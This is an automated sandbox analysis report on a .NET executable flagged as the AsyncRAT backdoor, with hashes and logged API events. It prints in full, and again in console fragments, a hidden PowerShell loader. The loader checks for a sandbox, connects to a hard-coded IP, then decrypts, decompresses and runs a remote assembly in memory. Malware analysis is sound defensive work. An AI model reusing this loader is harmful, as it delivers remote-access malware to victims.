Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	April 27, 2023, 9:45 a.m.	April 27, 2023, 9:47 a.m.

Size	299.0KB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`6bdbea0ec35358cc728f0213603bc9f5`
SHA256	`d13297572805b9344d4064c3263ae84360e45b3eb258aba01bcfed5ef159e45a`
CRC32	`B675C1A1`
ssdeep	`6144:2MiqJTwuntkD0nbaEZg9pxQy96J3UE+AsUrT1IOq:FEXf2y9BEhnn14`
Yara	Is_DotNET_EXE - (no description) Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT IsPE32 - (no description) PE_Header_Zero - PE File Signature

originalbuild.exe "C:\Users\test22\AppData\Local\Temp\originalbuild.exe"
884
- powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command if ([System.Environment]::GetEnvironmentVariables().Count -lt 10) {exit -65536;} $chigoesTimist = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('OTEuMjE1Ljg1LjE5OA==')); $alfaquiJundies = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('MzU5NjQ=')); $slawsMetrize = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ODNjNjk=')); $outgoOctads = new-object System.Net.Sockets.TcpClient; $outgoOctads.Connect($chigoesTimist, [int]$alfaquiJundies); $slawsOutgo = $outgoOctads.GetStream(); $outgoOctads.SendTimeout = 300000; $outgoOctads.ReceiveTimeout = 300000; $slawsExclaim = [System.Text.StringBuilder]::new(); $slawsExclaim.AppendLine('GET /' + $slawsMetrize); $slawsExclaim.AppendLine('Host: ' + $chigoesTimist); $slawsExclaim.AppendLine(); $slawsVoguish = [System.Text.Encoding]::ASCII.GetBytes($slawsExclaim.ToString()); $slawsOutgo.Write($slawsVoguish, 0, $slawsVoguish.Length); $octadsExclaim = New-Object System.IO.MemoryStream; $slawsOutgo.CopyTo($octadsExclaim); $slawsOutgo.Dispose(); $outgoOctads.Dispose(); $octadsExclaim.Position = 0; $exclaimOctads = $octadsExclaim.ToArray(); $octadsExclaim.Dispose(); $jundiesExclaim = [System.Text.Encoding]::ASCII.GetString($exclaimOctads).IndexOf('`r`n`r`n')+1; $voguishJundies = [System.Text.Encoding]::ASCII.GetString($exclaimOctads[$jundiesExclaim..($exclaimOctads.Length-1)]); $voguishJundies = [System.Convert]::FromBase64String($voguishJundies); $alfaquiSlaws = New-Object System.Security.Cryptography.AesManaged; $alfaquiSlaws.Mode = [System.Security.Cryptography.CipherMode]::CBC; $alfaquiSlaws.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $alfaquiSlaws.Key = [System.Convert]::FromBase64String('HFk5TkL1SWFKf0ttQovZt1j+09jfjjOj6rSlVOK1CGU='); $alfaquiSlaws.IV = [System.Convert]::FromBase64String('34A3btGY/kf2JLl8KGEavg=='); $alfaquiVoguish = $alfaquiSlaws.CreateDecryptor(); $voguishJundies = $alfaquiVoguish.TransformFinalBlock($voguishJundies, 0, $voguishJundies.Length); $alfaquiVoguish.Dispose(); $alfaquiSlaws.Dispose(); $metrizeChigoes = New-Object System.IO.MemoryStream(, $voguishJundies); $alfaquiOctads = New-Object System.IO.MemoryStream; $voguishOutgo = New-Object System.IO.Compression.GZipStream($metrizeChigoes, [IO.Compression.CompressionMode]::Decompress); $voguishOutgo.CopyTo($alfaquiOctads); $voguishJundies = $alfaquiOctads.ToArray(); $metrizeSlaws = [System.Reflection.Assembly]::Load($voguishJundies); $timistVoguish = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('b290aGVjYUZsYXdmdWw=')); $outgoTimist = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('b2N0YWRzVGltaXN0')); $octadsAlfaqui = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('bWV0cml6ZUV4Y2xhaW0=')); $chigoesOctads = $metrizeSlaws.GetType($timistVoguish + '.' + $outgoTimist); $voguishAlfaqui = $chigoesOctads.GetMethod($octadsAlfaqui); $voguishAlfaqui.Invoke($jundiesSlaws, (, [string[]] (''))); #($jundiesSlaws, $jundiesSlaws);
  2080

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
91.215.85.198	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW April 27, 2023, 9:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 27, 2023, 9:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 27, 2023, 9:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 27, 2023, 9:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 27, 2023, 9:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 27, 2023, 9:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 27, 2023, 9:45 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (4 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent April 27, 2023, 9:45 a.m.			0	0
IsDebuggerPresent April 27, 2023, 9:45 a.m.			0	0
IsDebuggerPresent April 27, 2023, 9:45 a.m.			0	0
IsDebuggerPresent April 27, 2023, 9:45 a.m.			0	0

Command line console output was observed (50 out of 712 events)

Time & API	Arguments	Status	Return
WriteConsoleW April 27, 2023, 9:45 a.m.	buffer: Method invocation failed because [System.Text.StringBuilder] doesn't contain a console_handle: 0x00000023	1	1
WriteConsoleW April 27, 2023, 9:45 a.m.	buffer: method named 'new'. console_handle: 0x0000002f	1	1
WriteConsoleW April 27, 2023, 9:45 a.m.	buffer: At line:1 char:686 console_handle: 0x0000003b	1	1
WriteConsoleW April 27, 2023, 9:45 a.m.	buffer: + if ([System.Environment]::GetEnvironmentVariables().Count -lt 10) {exit -6553 console_handle: 0x00000047	1	1
WriteConsoleW April 27, 2023, 9:45 a.m.	buffer: 6;} $chigoesTimist = [System.Text.Encoding]::UTF8.GetString([System.Convert]::F console_handle: 0x00000053	1	1
WriteConsoleW April 27, 2023, 9:45 a.m.	buffer: romBase64String('OTEuMjE1Ljg1LjE5OA==')); $alfaquiJundies = [System.Text.Encodi console_handle: 0x0000005f	1	1
WriteConsoleW April 27, 2023, 9:45 a.m.	buffer: ng]::UTF8.GetString([System.Convert]::FromBase64String('MzU5NjQ=')); $slawsMetr console_handle: 0x0000006b	1	1
WriteConsoleW April 27, 2023, 9:45 a.m.	buffer: ize = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String console_handle: 0x00000077	1	1
WriteConsoleW April 27, 2023, 9:45 a.m.	buffer: ('ODNjNjk=')); $outgoOctads = new-object System.Net.Sockets.TcpClient; $outgoOc console_handle: 0x00000083	1	1
WriteConsoleW April 27, 2023, 9:45 a.m.	buffer: tads.Connect($chigoesTimist, [int]$alfaquiJundies); $slawsOutgo = $outgoOctads. console_handle: 0x0000008f	1	1
WriteConsoleW April 27, 2023, 9:45 a.m.	buffer: GetStream(); $outgoOctads.SendTimeout = 300000; $outgoOctads.ReceiveTimeout = 3 console_handle: 0x0000009b	1	1
WriteConsoleW April 27, 2023, 9:45 a.m.	buffer: 00000; $slawsExclaim = [System.Text.StringBuilder]::new <<<< (); $slawsExclaim. console_handle: 0x000000a7	1	1
WriteConsoleW April 27, 2023, 9:45 a.m.	buffer: AppendLine('GET /' + $slawsMetrize); $slawsExclaim.AppendLine('Host: ' + $chigo console_handle: 0x000000b3	1	1
WriteConsoleW April 27, 2023, 9:45 a.m.	buffer: esTimist); $slawsExclaim.AppendLine(); $slawsVoguish = [System.Text.Encoding]:: console_handle: 0x000000bf	1	1
WriteConsoleW April 27, 2023, 9:45 a.m.	buffer: ASCII.GetBytes($slawsExclaim.ToString()); $slawsOutgo.Write($slawsVoguish, 0, $ console_handle: 0x000000cb	1	1
WriteConsoleW April 27, 2023, 9:45 a.m.	buffer: slawsVoguish.Length); $octadsExclaim = New-Object System.IO.MemoryStream; $slaw console_handle: 0x000000d7	1	1
WriteConsoleW April 27, 2023, 9:45 a.m.	buffer: sOutgo.CopyTo($octadsExclaim); $slawsOutgo.Dispose(); $outgoOctads.Dispose(); $ console_handle: 0x000000e3	1	1
WriteConsoleW April 27, 2023, 9:45 a.m.	buffer: octadsExclaim.Position = 0; $exclaimOctads = $octadsExclaim.ToArray(); $octadsE console_handle: 0x000000ef	1	1
WriteConsoleW April 27, 2023, 9:45 a.m.	buffer: xclaim.Dispose(); $jundiesExclaim = [System.Text.Encoding]::ASCII.GetString($ex console_handle: 0x000000fb	1	1
WriteConsoleW April 27, 2023, 9:45 a.m.	buffer: claimOctads).IndexOf('`r`n`r`n')+1; $voguishJundies = [System.Text.Encoding]::A console_handle: 0x00000107	1	1
WriteConsoleW April 27, 2023, 9:45 a.m.	buffer: SCII.GetString($exclaimOctads[$jundiesExclaim..($exclaimOctads.Length-1)]); $vo console_handle: 0x00000113	1	1
WriteConsoleW April 27, 2023, 9:45 a.m.	buffer: guishJundies = [System.Convert]::FromBase64String($voguishJundies); $alfaquiSla console_handle: 0x0000011f	1	1
WriteConsoleW April 27, 2023, 9:45 a.m.	buffer: ws = New-Object System.Security.Cryptography.AesManaged; $alfaquiSlaws.Mode = [ console_handle: 0x0000012b	1	1
WriteConsoleW April 27, 2023, 9:45 a.m.	buffer: System.Security.Cryptography.CipherMode]::CBC; $alfaquiSlaws.Padding = [System. console_handle: 0x00000137	1	1
WriteConsoleW April 27, 2023, 9:45 a.m.	buffer: Security.Cryptography.PaddingMode]::PKCS7; $alfaquiSlaws.Key = [System.Convert] console_handle: 0x00000143	1	1
WriteConsoleW April 27, 2023, 9:45 a.m.	buffer: ::FromBase64String('HFk5TkL1SWFKf0ttQovZt1j+09jfjjOj6rSlVOK1CGU='); $alfaquiSla console_handle: 0x0000014f	1	1
WriteConsoleW April 27, 2023, 9:45 a.m.	buffer: ws.IV = [System.Convert]::FromBase64String('34A3btGY/kf2JLl8KGEavg=='); $alfaqu console_handle: 0x0000015b	1	1
WriteConsoleW April 27, 2023, 9:45 a.m.	buffer: iVoguish = $alfaquiSlaws.CreateDecryptor(); $voguishJundies = $alfaquiVoguish.T console_handle: 0x00000167	1	1
WriteConsoleW April 27, 2023, 9:45 a.m.	buffer: ransformFinalBlock($voguishJundies, 0, $voguishJundies.Length); $alfaquiVoguish console_handle: 0x00000173	1	1
WriteConsoleW April 27, 2023, 9:45 a.m.	buffer: .Dispose(); $alfaquiSlaws.Dispose(); $metrizeChigoes = New-Object System.IO.Mem console_handle: 0x0000017f	1	1
WriteConsoleW April 27, 2023, 9:45 a.m.	buffer: oryStream(, $voguishJundies); $alfaquiOctads = New-Object System.IO.MemoryStrea console_handle: 0x0000018b	1	1
WriteConsoleW April 27, 2023, 9:45 a.m.	buffer: m; $voguishOutgo = New-Object System.IO.Compression.GZipStream($metrizeChigoes, console_handle: 0x00000197	1	1
WriteConsoleW April 27, 2023, 9:45 a.m.	buffer: [IO.Compression.CompressionMode]::Decompress); $voguishOutgo.CopyTo($alfaquiOc console_handle: 0x000001a3	1	1
WriteConsoleW April 27, 2023, 9:45 a.m.	buffer: tads); $voguishJundies = $alfaquiOctads.ToArray(); $metrizeSlaws = [System.Refl console_handle: 0x000001af	1	1
WriteConsoleW April 27, 2023, 9:45 a.m.	buffer: ection.Assembly]::Load($voguishJundies); $timistVoguish = [System.Text.Encoding console_handle: 0x000001bb	1	1
WriteConsoleW April 27, 2023, 9:45 a.m.	buffer: ]::UTF8.GetString([System.Convert]::FromBase64String('b290aGVjYUZsYXdmdWw=')); console_handle: 0x000001c7	1	1
WriteConsoleW April 27, 2023, 9:45 a.m.	buffer: $outgoTimist = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBas console_handle: 0x000001d3	1	1
WriteConsoleW April 27, 2023, 9:45 a.m.	buffer: e64String('b2N0YWRzVGltaXN0')); $octadsAlfaqui = [System.Text.Encoding]::UTF8.G console_handle: 0x000001df	1	1
WriteConsoleW April 27, 2023, 9:45 a.m.	buffer: etString([System.Convert]::FromBase64String('bWV0cml6ZUV4Y2xhaW0=')); $chigoesO console_handle: 0x000001eb	1	1
WriteConsoleW April 27, 2023, 9:45 a.m.	buffer: ctads = $metrizeSlaws.GetType($timistVoguish + '.' + $outgoTimist); $voguishAlf console_handle: 0x000001f7	1	1
WriteConsoleW April 27, 2023, 9:45 a.m.	buffer: aqui = $chigoesOctads.GetMethod($octadsAlfaqui); $voguishAlfaqui.Invoke($jundie console_handle: 0x00000203	1	1
WriteConsoleW April 27, 2023, 9:45 a.m.	buffer: sSlaws, (, [string[]] (''))); #($jundiesSlaws, $jundiesSlaws); console_handle: 0x0000020f	1	1
WriteConsoleW April 27, 2023, 9:45 a.m.	buffer: + CategoryInfo : InvalidOperation: (new:String) [], RuntimeExcept console_handle: 0x0000021b	1	1
WriteConsoleW April 27, 2023, 9:45 a.m.	buffer: ion console_handle: 0x00000227	1	1
WriteConsoleW April 27, 2023, 9:45 a.m.	buffer: + FullyQualifiedErrorId : MethodNotFound console_handle: 0x00000233	1	1
WriteConsoleW April 27, 2023, 9:45 a.m.	buffer: You cannot call a method on a null-valued expression. console_handle: 0x00000253	1	1
WriteConsoleW April 27, 2023, 9:45 a.m.	buffer: At line:1 char:714 console_handle: 0x0000025f	1	1
WriteConsoleW April 27, 2023, 9:45 a.m.	buffer: + if ([System.Environment]::GetEnvironmentVariables().Count -lt 10) {exit -6553 console_handle: 0x0000026b	1	1
WriteConsoleW April 27, 2023, 9:45 a.m.	buffer: 6;} $chigoesTimist = [System.Text.Encoding]::UTF8.GetString([System.Convert]::F console_handle: 0x00000277	1	1
WriteConsoleW April 27, 2023, 9:45 a.m.	buffer: romBase64String('OTEuMjE1Ljg1LjE5OA==')); $alfaquiJundies = [System.Text.Encodi console_handle: 0x00000283	1	1

Uses Windows APIs to generate a cryptographic key (46 events)

Time & API	Arguments	Status	Return
CryptExportKey April 27, 2023, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0056fd88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0056fe08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0056fe08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0056fe08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00570688 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00570688 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00570688 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00570688 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00570688 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00570688 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0056fe08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0056fe08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0056fe08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0056ff48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0056ff48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0056ff48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00570748 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0056ff48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0056ff48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0056ff48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0056ff48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0056ff48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0056ff48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0056ff48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0056ffc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0056ffc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0056ffc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0056ffc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0056ffc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0056ffc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0056ffc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0056ffc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0056ffc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0056ffc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0056ffc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0056ffc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0056ffc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0056ffc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00570308 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00570308 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00570608 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00570608 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00570608 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00570608 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00570608 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 27, 2023, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00570608 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 27, 2023, 9:45 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 185 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory April 27, 2023, 9:45 a.m.	process_identifier: 884 region_size: 1310720 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007a0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 9:45 a.m.	process_identifier: 884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x008a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 27, 2023, 9:45 a.m.	process_identifier: 884 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f31000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 27, 2023, 9:45 a.m.	process_identifier: 884 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f32000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 9:45 a.m.	process_identifier: 884 region_size: 1769472 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c70000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 9:45 a.m.	process_identifier: 884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00de0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 9:45 a.m.	process_identifier: 884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00312000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 9:45 a.m.	process_identifier: 884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0032c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 9:45 a.m.	process_identifier: 884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00445000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 9:45 a.m.	process_identifier: 884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0044b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 9:45 a.m.	process_identifier: 884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00447000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 9:45 a.m.	process_identifier: 884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00620000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 9:45 a.m.	process_identifier: 884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00621000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 9:45 a.m.	process_identifier: 884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00622000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 9:45 a.m.	process_identifier: 884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0032a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 9:45 a.m.	process_identifier: 884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0033a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 9:45 a.m.	process_identifier: 884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00337000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 9:45 a.m.	process_identifier: 884 region_size: 12288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00623000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 9:45 a.m.	process_identifier: 884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00336000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 9:45 a.m.	process_identifier: 884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00626000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 9:45 a.m.	process_identifier: 884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04fb0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 9:45 a.m.	process_identifier: 884 region_size: 110592 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04fb1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 9:45 a.m.	process_identifier: 2080 region_size: 1245184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02630000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
